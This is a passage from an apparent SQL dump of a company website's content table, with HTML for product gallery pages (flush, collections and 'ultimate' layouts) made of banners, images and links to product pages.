href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU1\"><img alt=\"\" width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/001.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU2\"><img alt=\"\" width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/002.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU3\"><img alt=\"\" width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/005.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU4\"><img alt=\"\" width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/004.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU5\"><img alt=\"\" width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/006.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYw\"><img alt=\"\" width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/007.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYx\"><img alt=\"\" width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/008.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYy\"><img alt=\"\" width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/009.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYz\"><img alt=\"\" width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/010.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY0\"><img alt=\"\" width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/011.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY1\"><img alt=\"\" width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/012.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY2\"><img alt=\"\" width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/013.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY3\"><img alt=\"\" width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/014.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY4\"><img alt=\"\" width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/015.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY5\"><img alt=\"\" width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/016.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTcw\"><img alt=\"\" width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/017.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTcx\"><img alt=\"\" width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/018.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTcy\"><img alt=\"\" width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/019.jpg\" /></a></p>\r\n<br />\r\n<p> <img alt=\"\" width=\"724\" height=\"2000\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/layout text/layout final.jpg\" /></p>\r\n<p class=\"MsoNormal\"><span> </span><o:p> </o:p></p>\r\n<p> </p>','','','','','','','','','N','2013-03-15 08:47:07','2013-02-12 13:29:34',124),(145,'Layout1','1','FLUSH 2','flush2.php','flush 2','flush 2','flush 2','<p align=\"left\"><img width=\"726\" height=\"113\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/new banner/acrylic-banner.gif\" /><img alt=\"\" width=\"726\" height=\"509\" src=\"http://www.paulgrahamltd.com/EditorImages/image/flush/large/visual 6.jpg\" /><a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTI0\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/flush/small/visual 4.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTQ2\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/flush/small/visual 7.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTQ3\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/flush/small/visual 17.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTQ4\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/flush/small/visual 18.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTQ5\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/flush/small/visual 19.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTUw\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/flush/small/visual 67.jpg\" /></a></p>','','','','','','','','','N','2013-03-15 07:43:32','2013-02-12 20:51:17',148),(146,'Layout1','1','FLUSH 3','flush3.php','flush 3','flush 3','flush 3','<p align=\"left\"><img width=\"726\" height=\"113\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/new banner/acrylic-banner.gif\" /><img alt=\"\" width=\"726\" height=\"509\" src=\"http://www.paulgrahamltd.com/EditorImages/image/flush/large/visual 7.jpg\" /><a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTI0\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/flush/small/visual 4.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTQ1\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/flush/small/visual 6.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTQ3\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/flush/small/visual 17.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTQ4\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/flush/small/visual 18.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTQ5\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/flush/small/visual 19.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTUw\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/flush/small/visual 67.jpg\" /></a></p>','','','','','','','','','N','2013-03-15 07:44:01','2013-02-12 20:52:25',149),(147,'Layout1','1','FLUSH 4','flush4.php','flush 4','flush 4','flush 4','<p align=\"left\"><img width=\"726\" height=\"113\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/new banner/acrylic-banner.gif\" /><img alt=\"\" width=\"726\" height=\"509\" src=\"http://www.paulgrahamltd.com/EditorImages/image/flush/large/visual 17.jpg\" /><a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTI0\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/flush/small/visual 4.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTQ1\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/flush/small/visual 6.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTQ2\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/flush/small/visual 7.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTQ4\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/flush/small/visual 18.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTQ5\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/flush/small/visual 19.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTUw\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/flush/small/visual 67.jpg\" /></a></p>','','','','','','','','','N','2013-03-15 07:44:28','2013-02-12 20:52:57',150),(148,'Layout1','1','FLUSH 5','flush5.php','flush 5','flush 5','flush 5','<p align=\"left\"><img width=\"726\" height=\"113\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/new banner/acrylic-banner.gif\" /><img alt=\"\" width=\"726\" height=\"509\" src=\"http://www.paulgrahamltd.com/EditorImages/image/flush/large/visual 18.jpg\" /><a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTI0\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/flush/small/visual 4.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTQ1\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/flush/small/visual 6.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTQ2\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/flush/small/visual 7.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTQ3\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/flush/small/visual 17.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTQ5\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/flush/small/visual 19.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTUw\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/flush/small/visual 67.jpg\" /></a></p>','','','','','','','','','N','2013-03-15 07:44:49','2013-02-12 20:53:29',151),(149,'Layout1','1','FLUSH 6','flush6.php','flush 6','flush 6','flush 6','<p align=\"left\"><a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTQ2\">www.paulgrahamltd.com/product.php</a><img width=\"726\" height=\"113\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/new banner/acrylic-banner.gif\" /><img alt=\"\" width=\"726\" height=\"509\" src=\"http://www.paulgrahamltd.com/EditorImages/image/flush/large/visual 19.jpg\" /><a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTI0\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/flush/small/visual 4.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTQ1\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/flush/small/visual 6.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTQ2\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/flush/small/visual 7.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTQ3\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/flush/small/visual 17.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTQ4\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/flush/small/visual 18.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTUw\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/flush/small/visual 67.jpg\" /></a></p>','','','','','','','','','N','2013-03-15 07:45:32','2013-02-12 20:54:06',152),(150,'Layout1','1','FLUSH 7','flush7.php','flush 7','flush 7','flush 7','<p align=\"left\"><img width=\"726\" height=\"113\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/new banner/acrylic-banner.gif\" /><img alt=\"\" width=\"726\" height=\"509\" src=\"http://www.paulgrahamltd.com/EditorImages/image/flush/large/visual 67.jpg\" /><a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTI0\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/flush/small/visual 4.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTQ1\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/flush/small/visual 6.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTQ2\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/flush/small/visual 7.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTQ3\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/flush/small/visual 17.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTQ4\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/flush/small/visual 18.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTUw\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/flush/small/visual 19.jpg\" /></a></p>','','','','','','','','','N','2013-03-15 07:45:56','2013-02-12 20:54:45',153),(151,'Layout1','1','COLLECTIONS','collections.php','collections','collections','collections','<p><img alt=\"\" width=\"726\" height=\"113\" src=\"http://www.paulgrahamltd.com/EditorImages/image/test images/new test images/page banner/acrylic-banner(2).gif\" /><img alt=\"\" width=\"726\" height=\"509\" src=\"http://www.paulgrahamltd.com/EditorImages/image/collections/large/visual 1.jpg\" /><a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTUy\"><img alt=\"\" width=\"240\" height=\"168\" src=\"http://www.paulgrahamltd.com/EditorImages/image/collections/large/visual 3.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTUz\"><img alt=\"\" width=\"240\" height=\"168\" src=\"http://www.paulgrahamltd.com/EditorImages/image/collections/large/visual 5.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU0\"><img alt=\"\" width=\"240\" height=\"168\" src=\"http://www.paulgrahamltd.com/EditorImages/image/collections/large/visual 112.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTg0\"><img width=\"240\" height=\"168\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/COLLECTIONS IMAGES WITH TEXT/black coll 9 premier.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTg1\"><img alt=\"\" width=\"240\" height=\"168\" src=\"http://www.paulgrahamltd.com/EditorImages/image/COLLECTIONS IMAGES WITH TEXT/red flush collection.jpg\" /></a></p>','','','','','','','','','Y','2013-05-01 10:36:42','2013-02-13 08:49:32',127),(152,'Layout1','1','COLLECTION 3','collections2.php','collections 2','collections 2','collections 2','<img alt=\"\" width=\"726\" height=\"113\" src=\"http://www.paulgrahamltd.com/EditorImages/image/new banner/acrylic-banner.gif\" /><img alt=\"\" width=\"726\" height=\"509\" src=\"http://www.paulgrahamltd.com/EditorImages/image/collections/large/visual 3.jpg\" /><a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTUx\"><img alt=\"\" width=\"240\" height=\"168\" src=\"http://www.paulgrahamltd.com/EditorImages/image/collections/large/visual 1.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTUz\"><img alt=\"\" width=\"240\" height=\"168\" src=\"http://www.paulgrahamltd.com/EditorImages/image/collections/large/visual 5.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU0\"><img alt=\"\" width=\"240\" height=\"168\" src=\"http://www.paulgrahamltd.com/EditorImages/image/collections/large/visual 112.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTg0\"><img alt=\"\" width=\"240\" height=\"168\" src=\"http://www.paulgrahamltd.com/EditorImages/image/COLLECTIONS IMAGES WITH TEXT/black coll 9 premier.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTg1\"><img width=\"240\" height=\"168\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/COLLECTIONS IMAGES WITH TEXT/red flush collection.jpg\" /></a>','','','','','','','','','N','2013-05-01 10:35:41','2013-02-13 08:56:21',154),(153,'Layout1','1','COLLECTION 2','collections3.php','collections 3','collections 3','collections 3','<img alt=\"\" width=\"726\" height=\"113\" src=\"http://www.paulgrahamltd.com/EditorImages/image/new banner/acrylic-banner.gif\" /><img alt=\"\" width=\"726\" height=\"509\" src=\"http://www.paulgrahamltd.com/EditorImages/image/collections/large/visual 5.jpg\" /><a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTUx\"><img alt=\"\" width=\"240\" height=\"168\" src=\"http://www.paulgrahamltd.com/EditorImages/image/collections/large/visual 1.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTUy\"><img alt=\"\" width=\"240\" height=\"168\" src=\"http://www.paulgrahamltd.com/EditorImages/image/collections/large/visual 3.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU0\"><img alt=\"\" width=\"240\" height=\"168\" src=\"http://www.paulgrahamltd.com/EditorImages/image/collections/large/visual 112.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTg0\"><img alt=\"\" width=\"240\" height=\"168\" src=\"http://www.paulgrahamltd.com/EditorImages/image/COLLECTIONS IMAGES WITH TEXT/black coll 9 premier.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTg1\"><img width=\"240\" height=\"168\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/COLLECTIONS IMAGES WITH TEXT/red flush collection.jpg\" /></a>','','','','','','','','','N','2013-05-01 10:34:29','2013-02-13 08:56:57',155),(154,'Layout1','1','COLLECTION 4','collections4.php','collections 4','collections 4','collections 4','<img alt=\"\" width=\"726\" height=\"113\" src=\"http://www.paulgrahamltd.com/EditorImages/image/new banner/acrylic-banner.gif\" /><img alt=\"\" width=\"726\" height=\"509\" src=\"http://www.paulgrahamltd.com/EditorImages/image/collections/large/visual 112.jpg\" /><a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTUx\"><img alt=\"\" width=\"240\" height=\"168\" src=\"http://www.paulgrahamltd.com/EditorImages/image/collections/large/visual 1.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTUy\"><img alt=\"\" width=\"240\" height=\"168\" src=\"http://www.paulgrahamltd.com/EditorImages/image/collections/large/visual 3.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTUz\"><img alt=\"\" width=\"240\" height=\"168\" src=\"http://www.paulgrahamltd.com/EditorImages/image/collections/large/visual 5.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTg0\"><img alt=\"\" width=\"240\" height=\"168\" src=\"http://www.paulgrahamltd.com/EditorImages/image/COLLECTIONS IMAGES WITH TEXT/black coll 9 premier.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTg1\"><img width=\"240\" height=\"168\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/COLLECTIONS IMAGES WITH TEXT/red flush collection.jpg\" /></a>','','','','','','','','','N','2013-05-01 10:36:07','2013-02-13 08:57:37',156),(155,'Layout1','1','1','ultimate1.php','1','1','1','<p><img width=\"726\" height=\"113\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/new banner/acrylic-banner.gif\" /><img width=\"726\" height=\"509\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/large/001.jpg\" /></p>\r\n<br />\r\n<p><a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTQ0\"><img width=\"121\" height=\"85\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/003.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU2\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/002.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU3\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/005.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU4\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/004.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU5\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/006.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYw\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/007.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYx\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/008.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYy\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/009.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYz\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/010.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY0\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/011.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY1\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/012.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY2\"><img width=\"118\" height=\"86\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/barrett quad/small/quad visual.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY3\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/014.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY4\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/015.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY5\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/016.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTcw\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/017.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTcx\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/018.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTcy\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/019.jpg\" /></a></p>\r\n<br />\r\n<p> <img width=\"724\" height=\"2000\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/layout text/layout final.jpg\" /></p>\r\n<p class=\"MsoNormal\"><span> </span> </p>\r\n<p> </p>','','','','','','','','','N','2013-04-03 19:57:42','2013-02-13 19:43:21',157),(156,'Layout1','1','2','ultimate2.php','2','2','2','<p><img width=\"726\" height=\"113\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/new banner/acrylic-banner.gif\" /><img width=\"726\" height=\"509\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/large/002.jpg\" /></p>\r\n<br />\r\n<p><a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU1\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/001.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTQ0\"><img width=\"121\" height=\"85\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/003.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU3\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/005.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU4\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/004.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU5\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/006.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYw\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/007.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYx\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/008.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYy\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/009.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYz\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/010.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY0\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/011.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY1\"><img width=\"118\" height=\"83\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/012.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY2\"><img width=\"118\" height=\"86\" alt=\"\" 